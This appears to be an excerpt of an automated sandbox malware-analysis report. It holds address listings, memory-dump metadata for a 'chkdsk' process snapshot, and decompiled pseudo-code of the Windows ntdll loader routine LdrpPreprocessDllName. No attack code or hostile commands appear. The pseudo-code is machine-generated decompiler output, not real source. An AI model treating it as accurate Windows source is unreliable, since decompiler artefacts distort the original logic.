                                                                                                                    0x0584f263
                                                                                                                    0x0584f269
                                                                                                                    0x0584f26f
                                                                                                                    0x0584f275
                                                                                                                    0x0584f278
                                                                                                                    0x0584f27d
                                                                                                                    0x0584f45b
                                                                                                                    0x0584f461
                                                                                                                    0x0584f461
                                                                                                                    0x0584f283
                                                                                                                    0x0584f28d
                                                                                                                    0x0584f291
                                                                                                                    0x0584f292
                                                                                                                    0x0584f295
                                                                                                                    0x0584f3be
                                                                                                                    0x0584f3be
                                                                                                                    0x0584f3be
                                                                                                                    0x0584f29d
                                                                                                                    0x0584f2a1
                                                                                                                    0x0584f494
                                                                                                                    0x0584f498
                                                                                                                    0x0584f49d
                                                                                                                    0x0584f4a1
                                                                                                                    0x0584f4a5
                                                                                                                    0x058adcb5
                                                                                                                    0x058adcb7
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x058adcbd
                                                                                                                    0x0584f4ab
                                                                                                                    0x0584f4b2
                                                                                                                    0x058adcc2
                                                                                                                    0x058adcc4
                                                                                                                    0x058adcca
                                                                                                                    0x058adcd0
                                                                                                                    0x058adcd4
                                                                                                                    0x058adcf3
                                                                                                                    0x058adcf8
                                                                                                                    0x058adcd6
                                                                                                                    0x058adceb
                                                                                                                    0x058adcf0
                                                                                                                    0x058adcfe
                                                                                                                    0x058add03
                                                                                                                    0x058add08
                                                                                                                    0x058add10
                                                                                                                    0x058add12
                                                                                                                    0x058add17
                                                                                                                    0x058add17
                                                                                                                    0x058add1c
                                                                                                                    0x058add20
                                                                                                                    0x058add20
                                                                                                                    0x058adcc4
                                                                                                                    0x0584f4b8
                                                                                                                    0x0584f4be
                                                                                                                    0x0584f4c1
                                                                                                                    0x0584f4c5
                                                                                                                    0x0584f4c7
                                                                                                                    0x0584f4cb
                                                                                                                    0x0584f4cd
                                                                                                                    0x058add28
                                                                                                                    0x058add28
                                                                                                                    0x0584f4d9
                                                                                                                    0x0584f4d9
                                                                                                                    0x0584f4dd
                                                                                                                    0x0584f4e1
                                                                                                                    0x058add30
                                                                                                                    0x058add37
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x058add3d
                                                                                                                    0x058ae0fe
                                                                                                                    0x058ae0fe
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x058ae104
                                                                                                                    0x058ae10a
                                                                                                                    0x058ae10e
                                                                                                                    0x058ae12d
                                                                                                                    0x058ae132
                                                                                                                    0x058ae110
                                                                                                                    0x058ae125
                                                                                                                    0x058ae12a
                                                                                                                    0x058ae138
                                                                                                                    0x058ae13d
                                                                                                                    0x058ae142
                                                                                                                    0x058ae14a
                                                                                                                    0x058ae14c
                                                                                                                    0x058ae151
                                                                                                                    0x058ae151
                                                                                                                    0x00000000
                                                                                                                    0x0584f4e7
                                                                                                                    0x0584f4f5
                                                                                                                    0x0584f4fa
                                                                                                                    0x0584f4fc
                                                                                                                    0x058add44
                                                                                                                    0x058add44
                                                                                                                    0x058add4a
                                                                                                                    0x058add4f
                                                                                                                    0x058ae159
                                                                                                                    0x058ae159
                                                                                                                    0x0584f1d2
                                                                                                                    0x0584f1d2
                                                                                                                    0x0584f1d4
                                                                                                                    0x0584f1d4
                                                                                                                    0x00000000
                                                                                                                    0x0584f1d4
                                                                                                                    0x058add6d
                                                                                                                    0x058ae156
                                                                                                                    0x058ae156
                                                                                                                    0x00000000
                                                                                                                    0x058ae156
                                                                                                                    0x0584f502
                                                                                                                    0x0584f507
                                                                                                                    0x0584f50c
                                                                                                                    0x0584f50e
                                                                                                                    0x058add80
                                                                                                                    0x0584f514
                                                                                                                    0x0584f514
                                                                                                                    0x0584f514
                                                                                                                    0x0584f516
                                                                                                                    0x0584f519
                                                                                                                    0x058add8a
                                                                                                                    0x058add90
                                                                                                                    0x058add97
                                                                                                                    0x058adda9
                                                                                                                    0x058adda9
                                                                                                                    0x058add97
                                                                                                                    0x0584f51f
                                                                                                                    0x0584f523
                                                                                                                    0x0584f529
                                                                                                                    0x0584f52c
                                                                                                                    0x0584f532
                                                                                                                    0x058addb3
                                                                                                                    0x058addb3
                                                                                                                    0x0584f53c
                                                                                                                    0x0584f541
                                                                                                                    0x0584f54b
                                                                                                                    0x0584f550
                                                                                                                    0x0584f55c
                                                                                                                    0x0584f563
                                                                                                                    0x0584f56d
                                                                                                                    0x0584f570
                                                                                                                    0x0584f575
                                                                                                                    0x0584f577
                                                                                                                    0x0584f577
                                                                                                                    0x0584f577
                                                                                                                    0x0584f577
                                                                                                                    0x0584f57d
                                                                                                                    0x0584f582
                                                                                                                    0x058addc2
                                                                                                                    0x058addca
                                                                                                                    0x058addce
                                                                                                                    0x058addda
                                                                                                                    0x058addde
                                                                                                                    0x058adeaf
                                                                                                                    0x058adeb3
                                                                                                                    0x058adec1
                                                                                                                    0x058adec7
                                                                                                                    0x058adec7
                                                                                                                    0x058adde4
                                                                                                                    0x058adde8
                                                                                                                    0x058addea
                                                                                                                    0x058added
                                                                                                                    0x058addf7
                                                                                                                    0x058addfa
                                                                                                                    0x058addfc
                                                                                                                    0x058ade02
                                                                                                                    0x058ade08
                                                                                                                    0x058ade0a
                                                                                                                    0x058ade0d
                                                                                                                    0x058ade0f
                                                                                                                    0x058ade15
                                                                                                                    0x058ade18
                                                                                                                    0x058ade37
                                                                                                                    0x058ade3c
                                                                                                                    0x058ade1a
                                                                                                                    0x058ade2f
                                                                                                                    0x058ade34
                                                                                                                    0x058ade42
                                                                                                                    0x058ade47
                                                                                                                    0x058ade4d
                                                                                                                    0x058ade53
                                                                                                                    0x058ade55
                                                                                                                    0x058ade5a
                                                                                                                    0x058ade5a
                                                                                                                    0x058ade5f
                                                                                                                    0x058ade5f
                                                                                                                    0x058ade0d
                                                                                                                    0x058ade63
                                                                                                                    0x058ade66
                                                                                                                    0x058ade69
                                                                                                                    0x058ade72
                                                                                                                    0x058ade73
                                                                                                                    0x058ade77
                                                                                                                    0x058ade7c
                                                                                                                    0x058ade7e
                                                                                                                    0x058ade7f
                                                                                                                    0x058ade80
                                                                                                                    0x058ade81
                                                                                                                    0x058ade87
                                                                                                                    0x058ade88
                                                                                                                    0x058ade8d
                                                                                                                    0x058ade91
                                                                                                                    0x058ade91
                                                                                                                    0x058ade95
                                                                                                                    0x058ade95
                                                                                                                    0x058ade9d
                                                                                                                    0x058adea0
                                                                                                                    0x058adea5
                                                                                                                    0x058adea5
                                                                                                                    0x058addde
                                                                                                                    0x0584f588
                                                                                                                    0x0584f58d
                                                                                                                    0x0584f58f
                                                                                                                    0x058aded7
                                                                                                                    0x0584f595
                                                                                                                    0x0584f595
                                                                                                                    0x0584f595
                                                                                                                    0x0584f597
                                                                                                                    0x0584f59a
                                                                                                                    0x058adee1
                                                                                                                    0x058adeea
                                                                                                                    0x058adef0
                                                                                                                    0x058adefb
                                                                                                                    0x058adefd
                                                                                                                    0x058adf08
                                                                                                                    0x058adf08
                                                                                                                    0x058adf08
                                                                                                                    0x058adf2b
                                                                                                                    0x058adf2b
                                                                                                                    0x058adef0
                                                                                                                    0x0584f5a0
                                                                                                                    0x0584f5a5
                                                                                                                    0x0584f5aa
                                                                                                                    0x0584f5af
                                                                                                                    0x0584f5b1
                                                                                                                    0x058adf3e
                                                                                                                    0x0584f5b7
                                                                                                                    0x0584f5b7
                                                                                                                    0x0584f5b7
                                                                                                                    0x0584f5b9
                                                                                                                    0x0584f5bc
                                                                                                                    0x058adf4a
                                                                                                                    0x058adf4c
                                                                                                                    0x058adf57
                                                                                                                    0x058adf57
                                                                                                                    0x058adf57
                                                                                                                    0x058adf5c
                                                                                                                    0x058adf5d
                                                                                                                    0x058adf61
                                                                                                                    0x058adf7c
                                                                                                                    0x058adf88
                                                                                                                    0x058adf89
                                                                                                                    0x058adf8d
                                                                                                                    0x058adf8d
                                                                                                                    0x00000000
                                                                                                                    0x0584f5bc
                                                                                                                    0x0584f4e1
                                                                                                                    0x0584f2a7
                                                                                                                    0x0584f2ad
                                                                                                                    0x0584f2b6
                                                                                                                    0x0584f2ba
                                                                                                                    0x0584f2bc
                                                                                                                    0x058adf97
                                                                                                                    0x058adf9d
                                                                                                                    0x058adf9d
                                                                                                                    0x0584f2c4
                                                                                                                    0x0584f2c7
                                                                                                                    0x0584f2cb
                                                                                                                    0x0584f2cd
                                                                                                                    0x0584f2d2
                                                                                                                    0x0584f2d6
                                                                                                                    0x0584f3c8
                                                                                                                    0x0584f3c8
                                                                                                                    0x0584f2dc
                                                                                                                    0x0584f2e1
                                                                                                                    0x0584f2e3
                                                                                                                    0x058ae0ed
                                                                                                                    0x058ae0f3
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x058ae0f9
                                                                                                                    0x00000000
                                                                                                                    0x058ae0f9
                                                                                                                    0x0584f2e9
                                                                                                                    0x0584f2eb
                                                                                                                    0x0584f2ef
                                                                                                                    0x0584f2f3
                                                                                                                    0x0584f302
                                                                                                                    0x0584f302
                                                                                                                    0x0584f304
                                                                                                                    0x0584f346
                                                                                                                    0x0584f346
                                                                                                                    0x0584f348
                                                                                                                    0x0584f34c
                                                                                                                    0x0584f3ea
                                                                                                                    0x0584f3f2
                                                                                                                    0x0584f3f6
                                                                                                                    0x0584f402
                                                                                                                    0x0584f406
                                                                                                                    0x058ae046
                                                                                                                    0x058ae049
                                                                                                                    0x058ae057
                                                                                                                    0x058ae05d
                                                                                                                    0x058ae05d
                                                                                                                    0x0584f40c
                                                                                                                    0x0584f410
                                                                                                                    0x0584f413
                                                                                                                    0x0584f423
                                                                                                                    0x0584f426
                                                                                                                    0x0584f428
                                                                                                                    0x0584f42e
                                                                                                                    0x0584f434
                                                                                                                    0x058adfe4
                                                                                                                    0x058adfe7
                                                                                                                    0x058adfed
                                                                                                                    0x058adff3
                                                                                                                    0x058adff6
                                                                                                                    0x058ae015
                                                                                                                    0x058ae01a
                                                                                                                    0x058adff8
                                                                                                                    0x058ae00d
                                                                                                                    0x058ae012
                                                                                                                    0x058ae020
                                                                                                                    0x058ae025
                                                                                                                    0x058ae02b
                                                                                                                    0x058ae031
                                                                                                                    0x058ae033
                                                                                                                    0x058ae038
                                                                                                                    0x058ae038
                                                                                                                    0x058ae03d
                                                                                                                    0x058ae03d
                                                                                                                    0x058adfe7
                                                                                                                    0x0584f43a
                                                                                                                    0x0584f43d
                                                                                                                    0x0584f440
                                                                                                                    0x0584f442
                                                                                                                    0x0584f470
                                                                                                                    0x0584f471
                                                                                                                    0x0584f475
                                                                                                                    0x0584f47a
                                                                                                                    0x0584f47c
                                                                                                                    0x0584f47d
                                                                                                                    0x0584f47e
                                                                                                                    0x0584f47f
                                                                                                                    0x0584f482
                                                                                                                    0x0584f483
                                                                                                                    0x0584f488
                                                                                                                    0x0584f48c
                                                                                                                    0x0584f48c
                                                                                                                    0x0584f444
                                                                                                                    0x0584f444
                                                                                                                    0x0584f444
                                                                                                                    0x0584f446
                                                                                                                    0x0584f451
                                                                                                                    0x0584f451
                                                                                                                    0x0584f406
                                                                                                                    0x0584f36b
                                                                                                                    0x0584f37a
                                                                                                                    0x0584f37f
                                                                                                                    0x0584f384
                                                                                                                    0x0584f389
                                                                                                                    0x0584f38b
                                                                                                                    0x058ae06d
                                                                                                                    0x0584f391
                                                                                                                    0x0584f391
                                                                                                                    0x0584f391
                                                                                                                    0x0584f393
                                                                                                                    0x0584f396
                                                                                                                    0x058ae077
                                                                                                                    0x058ae080
                                                                                                                    0x058ae086
                                                                                                                    0x058ae091
                                                                                                                    0x058ae093
                                                                                                                    0x058ae09e
                                                                                                                    0x058ae09e
                                                                                                                    0x058ae09e
                                                                                                                    0x058ae0bb
                                                                                                                    0x058ae0bb
                                                                                                                    0x058ae086
                                                                                                                    0x0584f39c
                                                                                                                    0x0584f3a1
                                                                                                                    0x0584f3a6
                                                                                                                    0x0584f3a8
                                                                                                                    0x058ae0ce
                                                                                                                    0x0584f3ae
                                                                                                                    0x0584f3ae
                                                                                                                    0x0584f3ae
                                                                                                                    0x0584f3b0
                                                                                                                    0x0584f3b3
                                                                                                                    0x00000000
                                                                                                                    0x0584f3b9
                                                                                                                    0x058ae0dd
                                                                                                                    0x058ae0df
                                                                                                                    0x058adf70
                                                                                                                    0x058adf70
                                                                                                                    0x058adf70
                                                                                                                    0x058adf79
                                                                                                                    0x058adf7a
                                                                                                                    0x058adf7b
                                                                                                                    0x00000000
                                                                                                                    0x058adf7b
                                                                                                                    0x0584f3b3
                                                                                                                    0x0584f306
                                                                                                                    0x0584f31a
                                                                                                                    0x0584f31f
                                                                                                                    0x0584f321
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0584f327
                                                                                                                    0x0584f32c
                                                                                                                    0x0584f32e
                                                                                                                    0x058adfaf
                                                                                                                    0x0584f334
                                                                                                                    0x0584f334
                                                                                                                    0x0584f334
                                                                                                                    0x0584f339
                                                                                                                    0x0584f33c
                                                                                                                    0x058adfb9
                                                                                                                    0x058adfc2
                                                                                                                    0x058adfc8
                                                                                                                    0x058adfda
                                                                                                                    0x058adfda
                                                                                                                    0x058adfc8
                                                                                                                    0x0584f342
                                                                                                                    0x00000000
                                                                                                                    0x0584f342
                                                                                                                    0x0584f2f9
                                                                                                                    0x0584f2fc
                                                                                                                    0x0584f3d0
                                                                                                                    0x0584f3d2
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0584f3d8
                                                                                                                    0x0584f3db
                                                                                                                    0x00000000
                                                                                                                    0x0584f3e1
                                                                                                                    0x00000000
                                                                                                                    0x0584f3e1
                                                                                                                    0x0584f3db
                                                                                                                    0x00000000
                                                                                                                    0x0584f2fc
                                                                                                                    0x0584f14a
                                                                                                                    0x0584f150
                                                                                                                    0x058adc6e
                                                                                                                    0x00000000
                                                                                                                    0x058adc6e
                                                                                                                    0x0584f159
                                                                                                                    0x0584f15b
                                                                                                                    0x0584f162
                                                                                                                    0x0584f1d0
                                                                                                                    0x00000000
                                                                                                                    0x0584f17b
                                                                                                                    0x0584f184
                                                                                                                    0x0584f189
                                                                                                                    0x0584f18c
                                                                                                                    0x0584f18e
                                                                                                                    0x0584f19e
                                                                                                                    0x00000000
                                                                                                                    0x0584f1a0
                                                                                                                    0x0584f1a3
                                                                                                                    0x0584f1b1
                                                                                                                    0x0584f1ba
                                                                                                                    0x0584f1be
                                                                                                                    0x0584f1c5
                                                                                                                    0x0584f1dc
                                                                                                                    0x0584f1e4
                                                                                                                    0x0584f1e9
                                                                                                                    0x0584f1eb
                                                                                                                    0x0584f1ef
                                                                                                                    0x0584f1f4
                                                                                                                    0x0584f1fa
                                                                                                                    0x0584f1fa
                                                                                                                    0x0584f1eb
                                                                                                                    0x00000000
                                                                                                                    0x0584f1c5
                                                                                                                    0x0584f19e

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                                                                                    • API String ID: 0-523794902
                                                                                                                    • Opcode ID: d54c70020ef59db596fb6c1e5edcc76bf7606dfa9dc3c408f4385307c2b0e80a
                                                                                                                    • Instruction ID: c78fdaf9e93428eb91c2a6ad28d239b232a47e76b2d073fec6cb567885d4ca3f
                                                                                                                    • Opcode Fuzzy Hash: d54c70020ef59db596fb6c1e5edcc76bf7606dfa9dc3c408f4385307c2b0e80a
                                                                                                                    • Instruction Fuzzy Hash: 254298722093899FD715DB28C488A2ABBE6FF84608F04496DED86CB751DB34ED41CF52
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0586B0D0 Relevance: 7.8, Strings: 6, Instructions: 350COMMONCrypto
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 97%
                                                                                                                    			E0586B0D0(signed short* __ecx, signed short* __edx, signed int _a4, signed int* _a8) {
				char _v5;
				char _v6;
				char _v7;
				char _v8;
				signed short* _v12;
				char _v16;
				signed int _v20;
				char _v28;
				char _v36;
				char _v44;
				signed int _t75;
				char* _t76;
				signed int _t79;
				signed short* _t81;
				signed short* _t89;
				short* _t93;
				signed short* _t96;
				signed int _t97;
				signed int _t103;
				signed int _t112;
				void* _t119;
				char _t128;
				signed int _t134;
				signed short* _t135;
				signed int _t136;
				signed int* _t138;
				signed int _t140;
				signed short _t141;
				void* _t144;
				signed short _t145;
				signed int _t146;
				signed int _t151;
				signed short* _t161;
				signed short _t165;
				signed short _t168;
				signed short* _t183;
				signed int _t184;
				signed int _t186;
				void* _t189;

				_t135 = __ecx;
				_t183 = __edx;
				_v12 = __ecx;
				if(E0586C4A0(0,  &_v16) < 0) {
					_v8 = 0;
				} else {
					_v8 = 1;
				}
				_t138 = _a8;
				_t75 = 0;
				_t184 = 0;
				_v5 = 0;
				if(( *_t138 & 0x00800008) != 0) {
					L16:
					_v12 = _t135;
					if( *_t183 != 0) {
						__eflags =  *0x59437c0 & 0x00000005;
						if(( *0x59437c0 & 0x00000005) != 0) {
							__eflags = _t75;
							_t76 = "SxS";
							if(_t75 == 0) {
								_t76 = "API set";
							}
							_push(_t76);
							_push(_t183);
							E058CE692("minkernel\\ntdll\\ldrutil.c", 0xa78, "LdrpPreprocessDllName", 2, "DLL %wZ was redirected to %wZ by %s\n", _t135);
							_t138 = _a8;
							_t189 = _t189 + 0x20;
						}
						_t79 =  *_t138 | 0x00000200;
						__eflags = _v5;
						 *_t138 = _t79;
						if(_v5 != 0) {
							 *_t138 = _t79 | 0x00000004;
						}
						_t81 = _t183;
						_v12 = _t81;
						L27:
						if(_t184 < 0) {
							goto L83;
						}
						if(( *_t138 & 0x00000200) != 0) {
							E0585FCF0(_t138, _t183);
							_t81 = _v12;
						}
						_t165 = _t81[2];
						_t89 = ( *_t81 & 0x0000ffff) + 0xfffffffe + _t165;
						if(_t89 < _t165) {
							L34:
							_t184 = E0586C7E7(_t183, 0x582116c);
							goto L39;
						} else {
							while(1) {
								_t140 =  *_t89 & 0x0000ffff;
								if(_t140 == 0x2e) {
									break;
								}
								if(_t140 != 0x2f && _t140 != 0x5c) {
									_t89 = _t89 - 2;
									if(_t89 >= _t165) {
										continue;
									}
								}
								goto L34;
							}
							_t141 = _t183[2];
							_t93 = ( *_t183 & 0x0000ffff) + 0xfffffffe + _t141;
							__eflags = _t93 - _t141;
							if(_t93 < _t141) {
								L38:
								__eflags = 0;
								 *((short*)(_t93 + 2)) = 0;
								L39:
								if(_t184 < 0) {
									goto L83;
								}
								goto L40;
							}
							while(1) {
								__eflags =  *_t93 - 0x2e;
								if( *_t93 != 0x2e) {
									goto L38;
								}
								_t93 = _t93 - 2;
								 *_t183 =  *_t183 + 0xfffe;
								__eflags = _t93 - _t141;
								if(_t93 >= _t141) {
									continue;
								}
								goto L38;
							}
							goto L38;
						}
					}
					_t168 = _t135[2];
					_t96 = ( *_t135 & 0x0000ffff) + 0xfffffffe + _t168;
					if(_t96 < _t168) {
						L22:
						 *_t138 =  *_t138 | 0x00000020;
						_t184 = 0;
						_t97 =  *_t135 & 0x0000ffff;
						if(_t97 == 0) {
							L26:
							_t81 = _t135;
							goto L27;
						}
						_t144 = _t97 + ( *_t183 & 0x0000ffff) + 2;
						if(_t144 > (_t183[1] & 0x0000ffff)) {
							__eflags = _t144 - 0xfffe;
							if(_t144 <= 0xfffe) {
								_t62 = _t144 + 0x3f; // -191
								_t186 = _t62 & 0xffffffc0;
								__eflags = _t186 - 0xfffe;
								if(_t186 > 0xfffe) {
									_t186 = 0xfffe;
								}
								_t145 = _t183[2];
								_t64 =  &(_t183[4]); // 0x1000008
								__eflags = _t145 - _t64;
								if(_t145 == _t64) {
									_t146 = E05865D60(_t186);
									_v20 = _t146;
									__eflags = _t146;
									if(_t146 == 0) {
										goto L80;
									}
									_t103 =  *_t183 & 0x0000ffff;
									__eflags = _t103;
									if(_t103 != 0) {
										E058988C0(_t146, _t183[2], _t103);
										_t146 = _v20;
										_t189 = _t189 + 0xc;
									}
									goto L78;
								} else {
									_t146 = E058D3C57(_t186, _t145);
									L78:
									__eflags = _t146;
									if(_t146 == 0) {
										L80:
										_t184 = 0xc0000017;
										L25:
										_t138 = _a8;
										goto L26;
									}
									_t183[2] = _t146;
									_t183[1] = _t186;
									goto L24;
								}
							}
							_t184 = 0xc0000106;
							goto L25;
						}
						L24:
						_t184 = 0;
						E058988C0(( *_t183 & 0x0000ffff) + _t183[2], _t135[2],  *_t135 & 0x0000ffff);
						_t189 = _t189 + 0xc;
						 *_t183 =  *_t183 + ( *_t135 & 0x0000ffff);
						 *((short*)(_t183[2] + (( *_t183 & 0x0000ffff) >> 1) * 2)) = 0;
						goto L25;
					} else {
						goto L18;
					}
					while(1) {
						L18:
						_t151 =  *_t96 & 0x0000ffff;
						if(_t151 == 0x5c || _t151 == 0x2f) {
							break;
						}
						_t96 = _t96 - 2;
						if(_t96 >= _t168) {
							continue;
						}
						_t138 = _a8;
						goto L22;
					}
					__eflags = L0588432E(_t135) - 5;
					if(__eflags == 0) {
						_t184 = E0586C7E7(_t183, _t135);
						goto L25;
					}
					_t112 = E058723C4(_t135, _t183, __eflags);
					_t138 = _a8;
					_t184 = _t112;
					_t81 = _t135;
					__eflags = _t184;
					if(_t184 < 0) {
						goto L83;
					}
					 *_t138 =  *_t138 | 0x00000600;
					goto L27;
				} else {
					_v5 = 0;
					_v20 =  *[fs:0x30];
					_v7 = 1;
					E0586DF36(0, _t135, 0x14d0);
					asm("sbb edx, edx");
					if(E0587015C( *((intOrPtr*)( *[fs:0x30] + 0x38)), _t135,  ~_a4 & _a4 + 0x0000002c,  &_v6,  &_v28) < 0 || _v6 == 0) {
						_t119 = 0x14d3;
					} else {
						__eflags = _v28;
						if(_v28 == 0) {
							_t119 = 0x14d2;
						} else {
							_t119 = 0x14d1;
						}
					}
					E0586DF36(0, _t135, _t119);
					if(_v6 != 0) {
						__eflags = _v28;
						if(_v28 == 0) {
							_t184 = 0xc0000481;
							goto L14;
						}
						 *_t183 = 0;
						E05895050(0,  &_v44, E058601C0());
						E0586C7E7(_t183,  &_v44);
						E0586C7E7(_t183, 0x5821008);
						_t184 = E0586C7E7(_t183,  &_v28);
						__eflags = _t184;
						if(_t184 < 0) {
							goto L7;
						}
						_t134 =  *(_v20 + 0x10);
						__eflags = _t134;
						if(_t134 == 0) {
							L53:
							_t128 = 0;
							__eflags = 0;
							L54:
							_t161 = _t183;
							goto L8;
						}
						__eflags =  *(_t134 + 8) & 0x00001000;
						if(( *(_t134 + 8) & 0x00001000) != 0) {
							_t128 = 1;
							goto L54;
						}
						goto L53;
					} else {
						L7:
						_t128 = _v7;
						_t161 = _t135;
						L8:
						if(_t184 < 0) {
							L83:
							__eflags =  *0x59437c0 & 0x00000003;
							if(( *0x59437c0 & 0x00000003) != 0) {
								_push(_t184);
								E058CE692("minkernel\\ntdll\\ldrutil.c", 0xab2, "LdrpPreprocessDllName", 0, "LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx\n", _t135);
							}
							__eflags =  *0x59437c0 & 0x00000010;
							if(( *0x59437c0 & 0x00000010) != 0) {
								asm("int3");
							}
							L40:
							if(_v8 != 0) {
								E0586C4A0(_v16,  &_v16);
							}
							return _t184;
						} else {
							if(_t128 != 0 &&  *0x5945d70 == 0) {
								_t136 = E05869870(1, _t161, 0x582116c, 0,  &_v36, 0, 0, 0, 0);
								if(_t136 >= 0) {
									_v5 = 1;
									E058723C4( &_v36, _t183, __eflags);
									E0587E3C9( &_v36);
								}
								if(_t136 != 0xc0150008) {
									_t184 = _t136;
								}
								_t135 = _v12;
							}
							L14:
							if(_t184 < 0) {
								goto L83;
							} else {
								_t138 = _a8;
								_t75 = _v5;
								goto L16;
							}
						}
					}
				}
			}










































                                                                                                                    0x0586b0de
                                                                                                                    0x0586b0e3
                                                                                                                    0x0586b0e5
                                                                                                                    0x0586b0ef
                                                                                                                    0x058b81db
                                                                                                                    0x0586b0f5
                                                                                                                    0x0586b0f5
                                                                                                                    0x0586b0f5
                                                                                                                    0x0586b0f9
                                                                                                                    0x0586b0fc
                                                                                                                    0x0586b0fe
                                                                                                                    0x0586b100
                                                                                                                    0x0586b109
                                                                                                                    0x0586b1d5
                                                                                                                    0x0586b1d9
                                                                                                                    0x0586b1dc
                                                                                                                    0x0586b303
                                                                                                                    0x0586b30a
                                                                                                                    0x058b81f8
                                                                                                                    0x058b81fa
                                                                                                                    0x058b81ff
                                                                                                                    0x058b8201
                                                                                                                    0x058b8201
                                                                                                                    0x058b8206
                                                                                                                    0x058b8207
                                                                                                                    0x058b821f
                                                                                                                    0x058b8224
                                                                                                                    0x058b8227
                                                                                                                    0x058b8227
                                                                                                                    0x0586b312
                                                                                                                    0x0586b317
                                                                                                                    0x0586b31b
                                                                                                                    0x0586b31d
                                                                                                                    0x0586b3ff
                                                                                                                    0x0586b3ff
                                                                                                                    0x0586b323
                                                                                                                    0x0586b325
                                                                                                                    0x0586b264
                                                                                                                    0x0586b266
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0586b272
                                                                                                                    0x0586b2f6
                                                                                                                    0x0586b2fb
                                                                                                                    0x0586b2fb
                                                                                                                    0x0586b278
                                                                                                                    0x0586b281
                                                                                                                    0x0586b285
                                                                                                                    0x0586b2a0
                                                                                                                    0x0586b2ac
                                                                                                                    0x00000000
                                                                                                                    0x0586b287
                                                                                                                    0x0586b287
                                                                                                                    0x0586b287
                                                                                                                    0x0586b28d
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0586b292
                                                                                                                    0x0586b299
                                                                                                                    0x0586b29e
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0586b29e
                                                                                                                    0x00000000
                                                                                                                    0x0586b292
                                                                                                                    0x0586b2b3
                                                                                                                    0x0586b2b9
                                                                                                                    0x0586b2bb
                                                                                                                    0x0586b2bd
                                                                                                                    0x0586b2ca
                                                                                                                    0x0586b2ca
                                                                                                                    0x0586b2cc
                                                                                                                    0x0586b2d0
                                                                                                                    0x0586b2d2
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0586b2d2
                                                                                                                    0x0586b2c0
                                                                                                                    0x0586b2c0
                                                                                                                    0x0586b2c4
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x058b82bf
                                                                                                                    0x058b82c2
                                                                                                                    0x058b82c5
                                                                                                                    0x058b82c7
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x058b82cd
                                                                                                                    0x00000000
                                                                                                                    0x0586b2c0
                                                                                                                    0x0586b285
                                                                                                                    0x0586b1e5
                                                                                                                    0x0586b1eb
                                                                                                                    0x0586b1ef
                                                                                                                    0x0586b210
                                                                                                                    0x0586b210
                                                                                                                    0x0586b213
                                                                                                                    0x0586b215
                                                                                                                    0x0586b21b
                                                                                                                    0x0586b262
                                                                                                                    0x0586b262
                                                                                                                    0x00000000
                                                                                                                    0x0586b262
                                                                                                                    0x0586b225
                                                                                                                    0x0586b22d
                                                                                                                    0x058b823f
                                                                                                                    0x058b8245
                                                                                                                    0x058b8251
                                                                                                                    0x058b8254
                                                                                                                    0x058b8257
                                                                                                                    0x058b825d
                                                                                                                    0x058b825f
                                                                                                                    0x058b825f
                                                                                                                    0x058b8264
                                                                                                                    0x058b8267
                                                                                                                    0x058b826a
                                                                                                                    0x058b826c
                                                                                                                    0x058b827f
                                                                                                                    0x058b8281
                                                                                                                    0x058b8284
                                                                                                                    0x058b8286
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x058b8288
                                                                                                                    0x058b828b
                                                                                                                    0x058b828e
                                                                                                                    0x058b8295
                                                                                                                    0x058b829a
                                                                                                                    0x058b829d
                                                                                                                    0x058b829d
                                                                                                                    0x00000000
                                                                                                                    0x058b826e
                                                                                                                    0x058b8275
                                                                                                                    0x058b82a0
                                                                                                                    0x058b82a0
                                                                                                                    0x058b82a2
                                                                                                                    0x058b82b0
                                                                                                                    0x058b82b0
                                                                                                                    0x0586b25f
                                                                                                                    0x0586b25f
                                                                                                                    0x00000000
                                                                                                                    0x0586b25f
                                                                                                                    0x058b82a4
                                                                                                                    0x058b82a7
                                                                                                                    0x00000000
                                                                                                                    0x058b82a7
                                                                                                                    0x058b826c
                                                                                                                    0x058b8247
                                                                                                                    0x00000000
                                                                                                                    0x058b8247
                                                                                                                    0x0586b233
                                                                                                                    0x0586b236
                                                                                                                    0x0586b243
                                                                                                                    0x0586b24b
                                                                                                                    0x0586b24e
                                                                                                                    0x0586b25b
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0586b1f1
                                                                                                                    0x0586b1f1
                                                                                                                    0x0586b1f1
                                                                                                                    0x0586b1f7
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0586b206
                                                                                                                    0x0586b20b
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0586b20d
                                                                                                                    0x00000000
                                                                                                                    0x0586b20d
                                                                                                                    0x0586b3ae
